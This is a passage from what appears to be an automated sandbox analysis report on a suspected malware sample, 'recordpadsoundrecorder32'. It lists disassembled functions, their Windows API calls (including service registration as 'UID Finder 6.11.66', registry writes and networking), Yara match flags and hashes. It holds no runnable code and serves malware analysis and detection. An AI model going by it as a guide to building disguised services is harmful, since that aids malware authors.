                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                      • String ID:
                                                                                      • API String ID: 4293676635-0
                                                                                      • Opcode ID: 85f44ffb64f36cd519df812cc729a9a862834d05cc8d7de6d829f79d43ab8ddf
                                                                                      • Instruction ID: 8573233a6335daf90bd3a0c72322a3c38b3ec0d68dcaaff00cba5836fa14e644
                                                                                      • Opcode Fuzzy Hash: 85f44ffb64f36cd519df812cc729a9a862834d05cc8d7de6d829f79d43ab8ddf
                                                                                      • Instruction Fuzzy Hash: 1E01DCB0910B148FC728CF0AC240986FBF4EF88300B11C5AED84A8B321E375EA44CF90
                                                                                      Function 0040D7C5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 028445289e1d17ca44fd6ddc857260208a147ec373c43258bce9f01103d35b43
                                                                                      • Instruction ID: 35407e72e644422b4f690bcc2f847b3216d51792f8b5999b125aecd84f82dc6f
                                                                                      • Opcode Fuzzy Hash: 028445289e1d17ca44fd6ddc857260208a147ec373c43258bce9f01103d35b43
                                                                                      • Instruction Fuzzy Hash: 9FE0C260659403AEE98229D04EA497B3F4CD94138C3704536E2F3B21D3C727CD0B61EE
                                                                                      Function 0260E2DE Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E2E3
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 0260E4FF: __EH_prolog.LIBCMT ref: 0260E504
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 4254904621-0
                                                                                      • Opcode ID: b5fbf4b35f72634b2089dbe9e8a4f37904457ca99e07c18c29e1aded8c464540
                                                                                      • Instruction ID: 5ddf41e41c2076d0eb113d569676daa68a868f7bccf3f8b7a48d6f4abdaa1c30
                                                                                      • Opcode Fuzzy Hash: b5fbf4b35f72634b2089dbe9e8a4f37904457ca99e07c18c29e1aded8c464540
                                                                                      • Instruction Fuzzy Hash: F8E0C270A40625AFDF0CEF6CD91173E77AAEB08300F0045ADB809D2380EF7199009F08
                                                                                      Function 02613402 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 02615C0A: __getptd_noexit.LIBCMT ref: 02615C0B
                                                                                        • Part of subcall function 02615C0A: __amsg_exit.LIBCMT ref: 02615C18
                                                                                        • Part of subcall function 02613443: __getptd_noexit.LIBCMT ref: 02613447
                                                                                        • Part of subcall function 02613443: __freeptd.LIBCMT ref: 02613461
                                                                                        • Part of subcall function 02613443: RtlExitUserThread.NTDLL(?,00000000,?,02613423,00000000), ref: 0261346A
                                                                                      • __XcptFilter.LIBCMT ref: 0261342F
                                                                                        • Part of subcall function 02618D44: __getptd_noexit.LIBCMT ref: 02618D48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                      • String ID:
                                                                                      • API String ID: 1405322794-0
                                                                                      • Opcode ID: 9a12f866ee62a4b532ea68f634c6df4d7238a21a327dcba9caf0b9c229f5bfd2
                                                                                      • Instruction ID: 41da08776fb4c93205925eec950badd34b759bd7efaaa407177a8fea3c3f583c
                                                                                      • Opcode Fuzzy Hash: 9a12f866ee62a4b532ea68f634c6df4d7238a21a327dcba9caf0b9c229f5bfd2
                                                                                      • Instruction Fuzzy Hash: BAE0ECB5D006009FEB08ABA4D945F2D7766EF44711F25019DE1029B2A1CA74A9509E29
                                                                                      Function 026617B2 Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 64c95028912b64b1a7f3bb0a0c1d362540dfa8fb1010e2c736b2a999a9d2fce2
                                                                                      • Instruction ID: ffb33abb336c0e68498976b499813a249a158ec831f28e13df72c8f351180eea
                                                                                      • Opcode Fuzzy Hash: 64c95028912b64b1a7f3bb0a0c1d362540dfa8fb1010e2c736b2a999a9d2fce2
                                                                                      • Instruction Fuzzy Hash: 70D05BF2C0C108EBD7153644EC0573FB760AB15240F0A0528D7C602300F5375A3ACAC7
                                                                                      Function 0040D07A Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040DAAA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: cb0e7b76a640d08c499b35eeede7cfcdb4648d5495989a2d1e2ae0225391a306
                                                                                      • Instruction ID: c516dca2397b2fac07020e058ced903cfa4834765396f8b763ac0801263e45c8
                                                                                      • Opcode Fuzzy Hash: cb0e7b76a640d08c499b35eeede7cfcdb4648d5495989a2d1e2ae0225391a306
                                                                                      • Instruction Fuzzy Hash: 29C01234614115DFD7005F74CD447653B70FF05740F000626A442A5190DB7484065A15
                                                                                      Function 004026FF Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCreateKeyExA.KERNELBASE(80000002), ref: 0040D82C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: eaf145f444873a6bff26022e61706261e4d44663e084ce3b01c6962bc98f21b3
                                                                                      • Instruction ID: 5ec97b2eb3e3170ad95daf285be8c754b41faf33349fba5b10927a7075397fb8
                                                                                      • Opcode Fuzzy Hash: eaf145f444873a6bff26022e61706261e4d44663e084ce3b01c6962bc98f21b3
                                                                                      • Instruction Fuzzy Hash: 58C08C20A08218D8D7D01AE52E0C7AE2A06AB043B4F30032AA633730C0CB348082A6BE
                                                                                      Function 02612110 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 026115C0: OpenEventA.KERNEL32(00100002,00000000,00000000,3DC92DE0), ref: 02611660
                                                                                        • Part of subcall function 026115C0: CloseHandle.KERNEL32(00000000), ref: 02611675
                                                                                        • Part of subcall function 026115C0: ResetEvent.KERNEL32(00000000,3DC92DE0), ref: 0261167F
                                                                                        • Part of subcall function 026115C0: CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 026116B4
                                                                                      • TlsSetValue.KERNEL32(00000026,?), ref: 0261215A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseEventHandle$OpenResetValue
                                                                                      • String ID:
                                                                                      • API String ID: 1556185888-0
                                                                                      • Opcode ID: f91e473dedcaa7f4fe77bbbce5e8ce1be74b7f476ed4c8c6a995a30b8a0dee7b
                                                                                      • Instruction ID: 19096a2d2bd363df14516c777c5421ef62c87876e3f72cb045201ffe4667aaaa
                                                                                      • Opcode Fuzzy Hash: f91e473dedcaa7f4fe77bbbce5e8ce1be74b7f476ed4c8c6a995a30b8a0dee7b
                                                                                      • Instruction Fuzzy Hash: 0801DF71A00244ABD300CF98D905F5EBBA8FB06660F104B6AF925D3380D77169108AA4
                                                                                      Function 00402810 Relevance: 1.3, APIs: 1, Instructions: 20memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 57a0741227dd9a16cd461ae8e65421ddc13f5886cd6de5791e0686322d83ea60
                                                                                      • Instruction ID: 646227f3fef1f343ab71bcb68da16975c72f4075c55f098b44a112a7cca5064b
                                                                                      • Opcode Fuzzy Hash: 57a0741227dd9a16cd461ae8e65421ddc13f5886cd6de5791e0686322d83ea60
                                                                                      • Instruction Fuzzy Hash: FCE08C31800701EBC7014BA0CA8A6AABBB0BB00314F00803AE809725C0C3BC91AACBDA
                                                                                      Function 004022D9 Relevance: 1.3, APIs: 1, Instructions: 11sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: b4fe005c8e16b858d01d95fa0fd3f8ef258010f6ac9604675fd7048b94773a9b
                                                                                      • Instruction ID: e72a41b6dfdddac10ecd88bf8a051ea5708ec34d9fa41edd5dfe4d5b4977cec8
                                                                                      • Opcode Fuzzy Hash: b4fe005c8e16b858d01d95fa0fd3f8ef258010f6ac9604675fd7048b94773a9b
                                                                                      • Instruction Fuzzy Hash: D7C08C7880D800F2D20113502F0DBB83224A706308F30403BF806300D14AFE012BA98F
                                                                                      Function 004028C5 Relevance: 1.3, APIs: 1, Instructions: 5sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: e68fd7fce66a6d94e974ea7a7509de7a7ac7b8a460bc7d90a9001f94097f8646
                                                                                      • Instruction ID: 5f572b3b01697d3602dd085a38fc554daa16ccd5b5a82f5d4f3345458a6bfba9
                                                                                      • Opcode Fuzzy Hash: e68fd7fce66a6d94e974ea7a7509de7a7ac7b8a460bc7d90a9001f94097f8646
                                                                                      • Instruction Fuzzy Hash: A1B01130888800EAC2000BA0AE08B303E30B30030AF20003AAA0A300E08A3A088EAA0F

                                                                                      Non-executed Functions

                                                                                      Function 02610870 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 02609A87: __EH_prolog.LIBCMT ref: 02609A8C
                                                                                        • Part of subcall function 02609A87: _Allocate.LIBCPMT ref: 02609AE3
                                                                                        • Part of subcall function 02609A87: _memmove.LIBCMT ref: 02609B3A
                                                                                      • _memset.LIBCMT ref: 026108E9
                                                                                      • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02610952
                                                                                      • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 0261095A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                      • String ID: Unknown error$invalid string position
                                                                                      • API String ID: 1854462395-1837348584
                                                                                      • Opcode ID: 0f684700639d8c4b38261c52dbdefd49bc7d7c398a3f9fd34df818f200f0ee3e
                                                                                      • Instruction ID: 6f298285b00bdaa28659dc76ab02e6eb6550208a371f4aa9e2b3f77fbc0362dd
                                                                                      • Opcode Fuzzy Hash: 0f684700639d8c4b38261c52dbdefd49bc7d7c398a3f9fd34df818f200f0ee3e
                                                                                      • Instruction Fuzzy Hash: B451AC70208341DFEB14CF25C890B2FBBE5AB98704F58092DF88697292D771E588CF56
                                                                                      Function 026194D8 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02614E46,?,?,?,00000000), ref: 026194DD
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 026194E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 7d2ddb7cf950a667763b6522d318ad4964a8233e1767f61908af44f4aefdd77e
                                                                                      • Instruction ID: 890d5daa9540d13e9c862efc83efe1012cddaf1820cc2c00723f88d949afd423
                                                                                      • Opcode Fuzzy Hash: 7d2ddb7cf950a667763b6522d318ad4964a8233e1767f61908af44f4aefdd77e
                                                                                      • Instruction Fuzzy Hash: EFB09271484648EBCB222F91EC09F8DBF28EB04666F015810F60D440508B6254AC9AA1
                                                                                      Function 0260F809 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID:
                                                                                      • API String ID: 2102423945-0
                                                                                      • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                      • Instruction ID: 8e04df25bb5740225020da62a65895cb65bf947b2b22d0d747a80ab51bd07e84
                                                                                      • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                      • Instruction Fuzzy Hash: F6F082B1904309AAD714DF95D942B9DFBB8EF85310F208169D508A7380E6B07A118B94
                                                                                      Function 026024E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026024E6
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 026024FC
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 0260250E
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0260256D
                                                                                      • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 0260257F
                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02602599
                                                                                      • GetLastError.KERNEL32(?,7591DFB0), ref: 026025A2
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 026025F0
                                                                                      • InterlockedDecrement.KERNEL32(00000002), ref: 0260262F
                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 0260268E
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02602699
                                                                                      • InterlockedExchange.KERNEL32(00000000,00000001), ref: 026026AD
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 026026BD
                                                                                      • GetLastError.KERNEL32(?,7591DFB0), ref: 026026C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                      • String ID:
                                                                                      • API String ID: 1213838671-0
                                                                                      • Opcode ID: 4aaf6431a86a3e1b64adb0ac6cacf79278b3423449d869d3d4f8b0d8db8643b2
                                                                                      • Instruction ID: df9ea847d0edebaebcbe7e512d83d6d9427f3f821ec5fd8bb106a10232721501
                                                                                      • Opcode Fuzzy Hash: 4aaf6431a86a3e1b64adb0ac6cacf79278b3423449d869d3d4f8b0d8db8643b2
                                                                                      • Instruction Fuzzy Hash: D4612DB1940609AFCB15DFA4D598EAFFBB9FF08310F144569E906E3280D730A958DF64
                                                                                      Function 02604603 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604608
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                      • htons.WS2_32(?), ref: 02604669
                                                                                      • htonl.WS2_32(?), ref: 0260468C
                                                                                      • htonl.WS2_32(00000000), ref: 02604693
                                                                                      • htons.WS2_32(00000000), ref: 02604747
                                                                                      • _sprintf.LIBCMT ref: 0260475D
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      • htons.WS2_32(?), ref: 026046B0
                                                                                        • Part of subcall function 026096E5: __EH_prolog.LIBCMT ref: 026096EA
                                                                                        • Part of subcall function 026096E5: RtlEnterCriticalSection.NTDLL(00000020), ref: 02609765
                                                                                        • Part of subcall function 026096E5: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02609783
                                                                                        • Part of subcall function 02601BA7: __EH_prolog.LIBCMT ref: 02601BAC
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601BBC
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601BEA
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601C13
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601C56
                                                                                        • Part of subcall function 0260DEA1: __EH_prolog.LIBCMT ref: 0260DEA6
                                                                                      • htonl.WS2_32(?), ref: 0260497C
                                                                                      • htonl.WS2_32(00000000), ref: 02604983
                                                                                      • htonl.WS2_32(00000000), ref: 026049C8
                                                                                      • htonl.WS2_32(00000000), ref: 026049CF
                                                                                      • htons.WS2_32(?), ref: 026049EF
                                                                                      • htons.WS2_32(?), ref: 026049F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1645262487-0
                                                                                      • Opcode ID: 9e0d540f90fa3de2a03f5086b5caace14a72c237cbe699e890eb2afab183ec04
                                                                                      • Instruction ID: c986a745f4a64e9cb21b0b5e06b72395aa62d6724c92394f1b329d065619daf1
                                                                                      • Opcode Fuzzy Hash: 9e0d540f90fa3de2a03f5086b5caace14a72c237cbe699e890eb2afab183ec04
                                                                                      • Instruction Fuzzy Hash: 16026C71C00259EFDF29DBE4C884BEEBBB9AF04304F10459AE505B7280DB705A89DFA5
                                                                                      Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegisterServiceCtrlHandlerA.ADVAPI32(UID Finder 6.11.66,Function_0000235E), ref: 004023C1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
                                                                                      • GetLastError.KERNEL32 ref: 00402422
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                      • GetLastError.KERNEL32 ref: 00402450
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                      • CloseHandle.KERNEL32 ref: 004024A1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                      • String ID: UID Finder 6.11.66
                                                                                      • API String ID: 3346042915-245170862
                                                                                      • Opcode ID: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction ID: 4f107cf957cbd680cd4d605db27ce117804603c61eb7b626b01e69dba3e91430
                                                                                      • Opcode Fuzzy Hash: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction Fuzzy Hash: 3521C570441214EBC2105F16EFE9A267FA8FBC5794B11823EE544B22B2CBB90549CFAD
                                                                                      Function 026182E2 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlDecodePointer.NTDLL(?), ref: 026182EA
                                                                                      • _free.LIBCMT ref: 02618303
                                                                                        • Part of subcall function 02612F24: HeapFree.KERNEL32(00000000,00000000,?,02615C82,00000000,?,?,?,00000000,?,02618967,00000018,026316B8,00000008,026188B4,?), ref: 02612F38
                                                                                        • Part of subcall function 02612F24: GetLastError.KERNEL32(00000000,?,02615C82,00000000,?,?,?,00000000,?,02618967,00000018,026316B8,00000008,026188B4,?,?), ref: 02612F4A
                                                                                      • _free.LIBCMT ref: 02618316
                                                                                      • _free.LIBCMT ref: 02618334
                                                                                      • _free.LIBCMT ref: 02618346
                                                                                      • _free.LIBCMT ref: 02618357
                                                                                      • _free.LIBCMT ref: 02618362
                                                                                      • _free.LIBCMT ref: 02618386
                                                                                      • RtlEncodePointer.NTDLL(008798F0), ref: 0261838D
                                                                                      • _free.LIBCMT ref: 026183A2
                                                                                      • _free.LIBCMT ref: 026183B8
                                                                                      • _free.LIBCMT ref: 026183E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 3064303923-0
                                                                                      • Opcode ID: e149350d724d3ec945684730c170661ac456ff7a600445b02900d47e87ef2b54
                                                                                      • Instruction ID: 63da883f4450bb7d5eb86f7c83a697fa2b1ec6e511aa5a5f0ec13ab1d357aec0
                                                                                      • Opcode Fuzzy Hash: e149350d724d3ec945684730c170661ac456ff7a600445b02900d47e87ef2b54
                                                                                      • Instruction Fuzzy Hash: F821B472D842A0EFE7265F65F98051D77B9FB0672070D282DE80497340CB35ACA8CFA8
                                                                                      Function 00406897 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00408650,00000001,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 004068D9
                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,0040864C,00000001,00000000,00000000,?,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004068F5
                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,Wc@ ,?,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 0040693E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 00406976
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction ID: c30aaca26a5f6a0372154cda3c497b92e07e281ea3e6606adb1712902525b657
